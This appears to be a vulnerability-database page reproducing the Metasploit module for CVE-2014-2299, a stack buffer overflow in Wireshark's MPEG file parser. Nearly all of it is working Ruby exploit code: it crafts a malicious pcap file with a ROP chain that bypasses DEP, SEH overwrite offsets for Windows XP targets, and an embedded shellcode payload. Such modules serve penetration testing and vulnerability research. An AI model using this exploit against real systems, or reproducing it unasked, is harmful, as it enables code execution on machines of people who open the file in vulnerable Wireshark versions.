Wireshark wiretap/mpeg.c Stack Buffer Overflow

2014-04-24T18:17:08
ID MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW
Type metasploit
Reporter Rapid7
Modified 2020-10-02T20:00:37

Description

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
      'Description'    =&gt; %q{
          This module triggers a stack buffer overflow in Wireshark &lt;= 1.8.12/1.10.5
          by generating a malicious file.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt;
        [
          'Wesley Neelen', # Discovery vulnerability
          'j0sm1',  # Exploit and msf module
        ],
      'References'     =&gt;
        [
          [ 'CVE', '2014-2299'],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
          [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
          [ 'BID', '66066']
        ],
      'DefaultOptions' =&gt;
        {
          'EXITFUNC' =&gt; 'process',
        },
      'Payload'        =&gt;
        {
          'BadChars'    =&gt; "\xff",
          'Space'       =&gt; 600,
          'DisableNops' =&gt; 'True',
          'PrependEncoder' =&gt; "\x81\xec\xc8\x00\x00\x00" # sub esp,200
        },
      'Platform'       =&gt; 'win',
      'Targets'        =&gt;
        [
          [ 'WinXP SP3 Spanish (bypass DEP)',
            {
              'OffSet' =&gt; 69732,
              'OffSet2' =&gt; 70476,
              'Ret'    =&gt; 0x1c077cc3, # pop/pop/ret -&gt; "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
              'jmpesp' =&gt; 0x68e2bfb9,
            }
          ],
        [ 'WinXP SP2/SP3 English  (bypass DEP)',
            {
              'OffSet2' =&gt; 70692,
              'OffSet' =&gt; 70476,
              'Ret'    =&gt; 0x1c077cc3, # pop/pop/ret -&gt; krb5_32.dll module
              'jmpesp' =&gt; 0x68e2bfb9,
            }
          ],
        ],
      'Privileged'     =&gt; false,
      'DisclosureDate' =&gt; '2014-03-20'
    ))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'pcap file',  'mpeg_overflow.pcap']),
      ])
  end

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
    [
      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x62d9027c,  # ptr to &VirtualProtect() [IAT libcares-2.dll]
      0x61970969,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61988cf6,  # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x619c0a2a,  # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61841e98,  # & push esp # ret  [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x6191d11a,  # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x00000201,  # 0x00000201-&gt; ebx
      0x5a4c1414,  # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
      0x00000040,  # 0x00000040-&gt; edx
      0x6197660f,  # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x668242b9,  # &Writable location [libgnutls-26.dll]
      0x6199b8a5,  # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
      0x63a528c2,  # RETN (ROP NOP) [libgobject-2.0-0.dll]
      0x61863c2a,  # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x90909090,  # nop
      0x6199652d,  # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
    ].flatten.pack("V*")

    return rop_gadgets

  end

  def exploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    ropchain = create_rop_chain
    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -&gt; http://en.wikipedia.org/wiki/MP3#File_structure
    # Here we build the packet data
    packet = rand_text_alpha(883)
    packet &lt;&lt; "\x6c\x7d\x37\x6c" # NOP RETN
    packet &lt;&lt; "\x6c\x7d\x37\x6c" # NOP RETN
    packet &lt;&lt; ropchain
    packet &lt;&lt; payload.encoded                    # Shellcode
    packet &lt;&lt; rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)

    # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
    # After nseh and seh we haven't space, then we have to jump to another location.

    # When file is open with command line. This is NSEH/SEH overwrite
    packet &lt;&lt; make_nops(4) # nseh
    packet &lt;&lt; "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN

    packet &lt;&lt; rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk

    # When file is open with GUI interface. This is NSEH/SEH overwrite
    packet &lt;&lt; make_nops(4) # nseh
    # seh -&gt; # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **
    packet &lt;&lt; "\x55\x59\x80\x6b"

    print_status("Preparing payload")
    filecontent = magic_header
    filecontent &lt;&lt; packet
    print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
    file_create(filecontent)

  end
end